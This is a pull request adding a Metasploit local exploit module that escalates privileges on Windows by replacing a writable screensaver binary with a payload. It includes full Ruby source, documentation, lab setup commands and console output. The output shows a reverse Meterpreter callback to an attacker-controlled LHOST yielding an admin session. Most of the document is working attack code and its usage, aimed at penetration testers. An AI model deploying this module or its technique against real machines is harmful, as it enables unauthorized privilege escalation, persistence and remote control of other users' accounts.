### PR TITLE
Add Writable Windows Screensaver Privilege Escalation module

### DIFF
--- a/documentation/modules/exploit/windows/local/writable_screensaver.md
+++ b/documentation/modules/exploit/windows/local/writable_screensaver.md
@@ -1,0 +1,163 @@
+## Vulnerable Application
+
+This module exploits misconfigured file permissions on Windows screensaver executables.
+When a user session becomes idle, `winlogon.exe` executes the configured screensaver
+binary.
+
+The module checks the following registry keys in priority order to discover the
+screensaver path:
+
+1. `HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop` - Group Policy
+   (User Configuration). This key is written by GPO at user logon and takes precedence
+   over the standard per-user setting.
+2. `HKCU\Control Panel\Desktop` - standard per-user setting. Escalation depends on a
+   higher-privileged user sharing the same binary path.
+
+If the screensaver file is writable by a low-privileged user - or does not exist in a
+directory that is writable by a low-privileged user - the module replaces the binary on
+disk with a payload executable. When a user session becomes idle, `winlogon.exe`
+executes the replaced binary in that user's security context.
+
+The module only **reads** registry keys to discover the file path - it does not modify
+any registry values. Use the `SCREENSAVER_PATH` option if you know the target path from
+prior enumeration.
+
+The attack surface has existed since Windows NT 3.1 (1993), the first multi-user Windows
+to support screensavers via the `SCRNSAVE.EXE` registry value.
+
+### Vulnerable Conditions
+
+The target is vulnerable when **any** of the following are true:
+
+- The screensaver `.scr` file has weak file permissions (e.g., `Everyone: Full Control`)
+- The screensaver `.scr` file is located in a directory writable by unprivileged users
+  and the file does not exist (e.g., a custom path that was configured but never created)
+- A third-party application installs a screensaver to a non-standard writable location
+
+Default Windows screensavers in `C:\Windows\System32\` are not typically writable by
+unprivileged users. This module targets misconfigurations, not a default Windows
+vulnerability.
+
+### Setup
+
+To create a vulnerable test environment:
+
+1. Set up a Windows machine (any version from Windows 7 onward)
+2. Create a writable directory and place a screensaver in it:
+
+```
+mkdir C:\Screensavers
+icacls C:\Screensavers /grant "Everyone:(OI)(CI)F"
+copy C:\Windows\System32\Mystify.scr C:\Screensavers\corporate.scr
+```
+
+3. Configure the screensaver via registry for the target user:
+
+```
+reg add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /d "C:\Screensavers\corporate.scr" /f
+reg add "HKCU\Control Panel\Desktop" /v ScreenSaveActive /d 1 /f
+reg add "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /d 60 /f
+```
+
+Ensure the display power-off timeout is longer than the screensaver timeout so the
+screensaver has a chance to activate:
+
+```
+powercfg /change monitor-timeout-ac 0
+```
+
+4. Obtain a low-privileged session on the target (e.g., via a Meterpreter shell as a
+   standard user)
+
+## Options
+
+### SCREENSAVER_PATH
+
+Override the screensaver executable path instead of reading it from the registry.
+Useful when you already know the path from prior enumeration. When left blank
+(the default), the module checks the HKCU policy key and HKCU Desktop key in
+that order.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a session on a Windows target with a writable screensaver path
+3. Do: `use exploit/windows/local/writable_screensaver`
+4. Do: `set SESSION <session_id>`
+5. Do: `set PAYLOAD <payload>`
+6. Do: `set LHOST <lhost>`
+7. Do: `set LPORT <lport>`
+8. Do: `check`
+9. Verify the check reports the screensaver path is writable
+10. Do: `run`
+11. Verify the payload is written and a handler is started
+12. Wait for the user session to become idle (or manually trigger the screensaver)
+13. Verify you receive a new session
+
+## Scenarios
+
+### Windows 11 x64 with writable screensaver in C:\Screensavers\
+
+```
+msf6 > use exploit/windows/local/writable_screensaver
+msf6 exploit(windows/local/writable_screensaver) > set SESSION 1
+SESSION => 1
+msf6 exploit(windows/local/writable_screensaver) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/writable_screensaver) > set LHOST 192.0.2.1
+LHOST => 192.0.2.1
+msf6 exploit(windows/local/writable_screensaver) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(windows/local/writable_screensaver) > check
+[*] Screensaver path: C:\Screensavers\corporate.scr
+[*] Screensaver timeout: 60 seconds
+[+] The target appears to be vulnerable. Screensaver path 'C:\Screensavers\corporate.scr' is writable
+msf6 exploit(windows/local/writable_screensaver) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Screensaver path 'C:\Screensavers\corporate.scr' is writable
+[*] Screensaver timeout is 60 seconds (1 minutes)
+[*] Target screensaver: C:\Screensavers\corporate.scr
+[*] Backing up C:\Screensavers\corporate.scr ...
+[+] Original screensaver saved as loot: /root/.msf4/loot/20260402120000_default_192.0.2.1_screensaver.orig_123456.bin
+[*] Writing payload (7168 bytes) to C:\Screensavers\corporate.scr ...
+[+] Payload written to C:\Screensavers\corporate.scr
+[*] The payload will execute when the user session becomes idle
+[!] Manual cleanup: restore C:\Screensavers\corporate.scr from /root/.msf4/loot/20260402120000_default_192.0.2.1_screensaver.orig_123456.bin
+[*] Starting background multi/handler for windows/x64/meterpreter/reverse_tcp ...
+[+] Handler started as background job 1
+```
+
+After the user's session becomes idle and the screensaver activates:
+
+```
+[*] Sending stage (200774 bytes) to 192.0.2.1
+[*] Meterpreter session 2 opened (192.0.2.1:4444 -> 192.0.2.1:49721)
+
+msf6 exploit(windows/local/writable_screensaver) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: DESKTOP-TEST\admin
+```
+
+### Using SCREENSAVER_PATH override
+
+If you already know the screensaver path (e.g., from prior enumeration of another
+user's configuration), you can set it directly:
+
+```
+msf6 exploit(windows/local/writable_screensaver) > set SCREENSAVER_PATH C:\SharedApps\screensaver.scr
+SCREENSAVER_PATH => C:\SharedApps\screensaver.scr
+msf6 exploit(windows/local/writable_screensaver) > run
+```
+
+## Cleanup
+
+The module does **not** automatically restore the original screensaver because the
+exploit is event-dependent - it may take hours or days before a session is received.
+
+After exploitation:
+- The original screensaver is stored as loot (path printed during exploitation)
+- To restore: upload the loot file back to the original screensaver path
+- To remove: delete the payload file at the screensaver path

--- a/modules/exploits/windows/local/writable_screensaver.rb
+++ b/modules/exploits/windows/local/writable_screensaver.rb
@@ -1,0 +1,349 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::Registry
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Writable Windows Screensaver Privilege Escalation',
+        'Description' => %q{
+          This module exploits misconfigured file permissions on Windows screensaver
+          executables. It checks the following registry keys in priority order to
+          discover the screensaver path:
+
+          1. HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop (GPO)
+          2. HKCU\Control Panel\Desktop (per-user setting)
+
+          The GPO policy key is written by Group Policy under User Configuration
+          and takes precedence over the standard per-user Desktop key.
+
+          If multiple users share the same screensaver binary path and that binary is
+          writable by a low-privileged user, the module can replace it with a payload
+          executable. When a user session becomes idle, winlogon.exe runs the replaced
+          binary in that user's security context, enabling privilege escalation.
+
+          The module only reads registry keys to discover the file path. It does not
+          modify any registry values.
+
+          The original screensaver is backed up locally as loot before replacement.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'bcoles'
+        ],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter', 'powershell', 'shell'],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'References' => [
+          ['CWE', '732'],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_002_SCREENSAVER],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '1993-07-27', # Windows NT 3.1 release date, the first multi-user Windows to support screensavers
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [EVENT_DEPENDENT],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('SCREENSAVER_PATH', [false, 'Override the screensaver executable path (leave blank to read from registry)'])
+    ])
+  end
+
+  # Registry keys checked in priority order. The GPO policy key (written by
+  # User Configuration Group Policy) takes precedence over the standard
+  # per-user Desktop key. The screensaver GPO has no Computer Configuration
+  # equivalent, so there is no HKLM policy key.
+  SCREENSAVER_REG_KEYS = [
+    'HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop',
+    'HKCU\Control Panel\Desktop'
+  ].freeze
+
+  def screensaver_path
+    path = datastore['SCREENSAVER_PATH']
+    return expand_path(path) unless path.blank?
+
+    SCREENSAVER_REG_KEYS.each do |key|
+      path = registry_getvaldata(key, 'SCRNSAVE.EXE')
+      next if path.blank?
+
+      vprint_status("Found screensaver path in #{key}")
+      return expand_path(path)
+    end
+    nil
+  end
+
+  def screensaver_active?
+    SCREENSAVER_REG_KEYS.each do |key|
+      val = registry_getvaldata(key, 'ScreenSaveActive')
+      next if val.nil?
+
+      return val.to_s == '1'
+    end
+    false
+  end
+
+  def screensaver_timeout
+    SCREENSAVER_REG_KEYS.each do |key|
+      val = registry_getvaldata(key, 'ScreenSaveTimeOut')
+      next if val.nil?
+
+      return val.to_i
+    end
+    0
+  end
+
+  # Test whether a path is writable by the current user.
+  #
+  # If the file exists, it is atomically renamed to a temporary name and
+  # immediately renamed back. Both renames are atomic on NTFS when source
+  # and destination are on the same volume, so the original file is never
+  # destroyed.
+  #
+  # If the file does not exist, the parent directory is tested by creating
+  # and immediately removing a temporary file.
+  def writable?(path)
+    if exist?(path)
+      tmp = "#{path}.#{rand_text_alpha(6..8)}"
+      if exist?(tmp)
+        vprint_error("Temporary path #{tmp} already exists, skipping")
+        return false
+      end
+
+      unless rename_file(path, tmp)
+        vprint_status("Cannot rename #{path} - not writable")
+        return false
+      end
+
+      unless rename_file(tmp, path)
+        print_error("CRITICAL: Failed to rename #{tmp} back to #{path} - file may need manual recovery")
+        return false
+      end
+
+      true
+    else
+      parent = path.gsub(%r{[/\\][^/\\]+\z}, '')
+      unless directory?(parent)
+        vprint_status("Parent directory #{parent} does not exist")
+        return false
+      end
+
+      test_file = "#{parent}\\#{rand_text_alpha(8..12)}.tmp"
+      begin
+        write_file(test_file, rand_text_alpha(8))
+        rm_f(test_file)
+        true
+      rescue StandardError => e
+        vprint_error("Directory #{parent} is not writable: #{e.message}")
+        false
+      end
+    end
+  end
+
+  def screensaver_running?(path)
+    process_name = path.split(%r{[/\\]}).last
+    pids = pidof(process_name)
+    return false if pids.empty?
+
+    vprint_status("Screensaver process #{process_name} is running (PID: #{pids.join(', ')})")
+    true
+  end
+
+  def check
+    path = screensaver_path
+    if path.nil?
+      return CheckCode::Safe('No screensaver is configured in the registry')
+    end
+
+    vprint_status("Screensaver path: #{path}")
+
+    unless screensaver_active?
+      return CheckCode::Safe('Screensaver is not enabled (ScreenSaveActive != 1)')
+    end
+
+    timeout = screensaver_timeout
+    vprint_status("Screensaver timeout: #{timeout} seconds") if timeout > 0
+
+    unless writable?(path)
+      report_overridden_paths(path)
+      return CheckCode::Safe("Screensaver path '#{path}' is not writable")
+    end
+
+    CheckCode::Appears("Screensaver path '#{path}' is writable")
+  rescue StandardError => e
+    CheckCode::Unknown("Check failed: #{e.message}")
+  end
+
+  # When the effective screensaver path is not writable, check whether any
+  # lower-priority registry keys point to writable paths that are overridden
+  # by a higher-priority policy key.
+  def report_overridden_paths(effective_path)
+    past_effective = false
+    SCREENSAVER_REG_KEYS.each do |key|
+      val = registry_getvaldata(key, 'SCRNSAVE.EXE')
+      next if val.blank?
+
+      resolved = expand_path(val)
+      unless past_effective
+        if resolved == effective_path
+          vprint_status("Effective path set by #{key}")
+          past_effective = true
+        end
+        next
+      end
+
+      if writable?(resolved)
+        vprint_warning("#{key} points to writable '#{resolved}', but is overridden by a higher-priority policy key")
+      end
+    end
+  end
+
+  def exploit
+    path = screensaver_path
+    fail_with(Failure::NotFound, 'No screensaver path found') if path.nil?
+
+    unless screensaver_active?
+      fail_with(Failure::NotVulnerable, 'Screensaver is not enabled (ScreenSaveActive != 1)')
+    end
+
+    timeout = screensaver_timeout
+    if timeout > 0
+      print_status("Screensaver timeout is #{timeout} seconds (#{timeout / 60} minutes)")
+    else
+      print_warning('Screensaver timeout is not set - the screensaver may never activate')
+    end
+
+    print_status("Target screensaver: #{path}")
+
+    if screensaver_running?(path)
+      print_warning('Screensaver process is currently running - the file may be locked')
+    end
+
+    if exist?(path)
+      print_status("Backing up #{path} ...")
+      @original_data = read_file(path)
+      loot = store_loot(
+        'screensaver.original',
+        'application/octet-stream',
+        session,
+        @original_data,
+        path.split(%r{[/\\]}).last,
+        "Original screensaver from #{path}"
+      )
+      print_good("Original screensaver saved as loot: #{loot}")
+      @loot_path = loot
+    else
+      @original_data = nil
+      @loot_path = nil
+      print_status("#{path} does not exist and will be created")
+    end
+
+    payload_exe = generate_payload_exe
+    print_status("Writing payload (#{payload_exe.length} bytes) to #{path} ...")
+    write_file(path, payload_exe)
+    unless exist?(path)
+      fail_with(Failure::Unknown, "Payload was not written to #{path}")
+    end
+    print_good("Payload written to #{path}")
+
+    report_vuln(
+      host: session.session_host,
+      name: name,
+      info: "Writable screensaver at #{path}",
+      refs: references
+    )
+
+    print_status('The payload will execute when the user session becomes idle')
+    if @loot_path
+      print_warning("Manual cleanup required: restore #{path} from #{@loot_path}")
+    else
+      print_warning("Manual cleanup required: delete #{path}")
+    end
+
+    start_handler
+  end
+
+  def start_handler
+    payload_name = datastore['PAYLOAD']
+    lhost = datastore['LHOST']
+    lport = datastore['LPORT']
+    rhost = datastore['RHOST']
+    rport = datastore['RPORT']
+
+    # Determine connection parameters for reverse vs bind payloads
+    if !lhost.blank? && !lport.blank?
+      handler_key = { 'LHOST' => lhost, 'LPORT' => lport }
+    elsif !rhost.blank? && !rport.blank?
+      handler_key = { 'RHOST' => rhost, 'RPORT' => rport }
+    else
+      print_status('No LHOST/LPORT or RHOST/RPORT configured - skipping automatic handler')
+      return
+    end
+
+    if handler_exists?(handler_key)
+      print_status("Handler already exists for #{handler_key.values.join(':')}, skipping")
+      return
+    end
+
+    print_status("Starting background multi/handler for #{payload_name} ...")
+
+    handler = framework.exploits.create('multi/handler')
+    handler.datastore['PAYLOAD'] = payload_name
+    handler.datastore['ExitOnSession'] = false
+
+    # Forward payload options (LHOST, LPORT, RHOST, RPORT, etc.) from our datastore
+    payload_instance.datastore.each_pair do |k, v|
+      next if v.nil?
+      next if k == 'DisablePayloadHandler'
+
+      handler.datastore[k] = v
+    end
+
+    handler.exploit_simple(
+      'Payload' => payload_name,
+      'LocalInput' => user_input,
+      'LocalOutput' => user_output,
+      'RunAsJob' => true
+    )
+
+    if handler.job_id
+      print_good("Handler started as background job #{handler.job_id}")
+    else
+      opts = handler_key.map { |k, v| "-#{k[0]} #{v}" }.join(' ')
+      print_error("Failed to start handler. Run: handler -p #{payload_name} #{opts} -e ExitOnSession=false")
+    end
+  end
+
+  def handler_exists?(key)
+    framework.jobs.each_value do |job|
+      next unless job.name =~ %r{multi/handler}
+      next unless job.ctx&.first
+
+      ds = job.ctx[0].datastore
+      return true if key.all? { |k, v| ds[k].to_s == v.to_s }
+    end
+    false
+  end
+end


### PR DESCRIPTION
This adds a new local exploit module that checks whether the configured Windows screensaver binary is writable by the current user. If it is, the module replaces it with a payload executable. When a user session becomes idle, `winlogon.exe` runs the screensaver and the payload fires.


### Why this module?

This technique has given me shells a few times in corporate environments. It's common for organizations to deploy custom screensavers to non-standard paths (e.g., `C:\CompanyApps\branding.scr`) sometimes with overly permissive ACLs, or to configure screensaver paths that point to files that no longer exist in writable directories.

The module is particularly useful via **Local Exploit Suggester** — it can be discovered automatically when enumerating privilege escalation paths from a low-privileged session.


### Implementation notes

Unfortunately, Windows does not expose an API to test whether a file is writable without actually opening it for writing. Opening the `.scr` file for write access would trigger AV/EDR and could corrupt it if interrupted. Instead, the `writable?` method atomically renames the file to a temporary name, then immediately renames it back. Both renames are atomic on NTFS (same volume), so the original file is never destroyed. For screensaver paths where the file doesn't exist, the module tests the parent directory by creating and removing a temporary file.

### Features

- Reads screensaver path from Windows Registry (or accepts manual override via `SCREENSAVER_PATH`)
- Validates `ScreenSaveActive` is enabled and reports `ScreenSaveTimeOut` to the operator
- Warns if the screensaver process is currently running (file may be locked)
- Backs up the original screensaver as local loot before replacement
- Automatically starts a background `multi/handler` with `ExitOnSession=false` (skips if one is already listening)
- Reports the vulnerability to the framework database via `report_vuln`
- No auto-cleanup — the exploit is event-dependent and may take hours to fire; manual cleanup instructions are printed with the loot path


## Verification

1. Start `msfconsole`
2. Get a session on a Windows target with a writable screensaver path
3. Do: `use exploit/windows/local/writable_screensaver`
4. Do: `set SESSION <session_id>`
5. Do: `set PAYLOAD <payload>`
6. Do: `set LHOST <lhost>`
7. Do: `set LPORT <lport>`
8. Do: `check`
9. Verify the check reports the screensaver path is writable
10. Do: `run`
11. Verify the payload is written and a handler is started
12. Wait for the user session to become idle (or manually trigger the screensaver)
13. Verify you receive a new session


### Module output

```
msf6 exploit(windows/local/writable_screensaver) > check
[*] Screensaver path: C:\Screensavers\corporate.scr
[*] Screensaver timeout: 60 seconds
[+] The target appears to be vulnerable. Screensaver path 'C:\Screensavers\corporate.scr' is writable

msf6 exploit(windows/local/writable_screensaver) > run
[+] The target appears to be vulnerable. Screensaver path 'C:\Screensavers\corporate.scr' is writable
[*] Screensaver timeout is 60 seconds (1 minutes)
[*] Target screensaver: C:\Screensavers\corporate.scr
[*] Backing up C:\Screensavers\corporate.scr ...
[+] Original screensaver saved as loot: /root/.msf4/loot/20260402_screensaver.orig_123456.bin
[*] Writing payload (7168 bytes) to C:\Screensavers\corporate.scr ...
[+] Payload written to C:\Screensavers\corporate.scr
[*] The payload will execute when the user session becomes idle
[!] Manual cleanup: restore C:\Screensavers\corporate.scr from /root/.msf4/loot/20260402_screensaver.orig_123456.bin
[*] Starting background multi/handler for windows/x64/meterpreter/reverse_tcp ...
[+] Handler started as background job 1
```
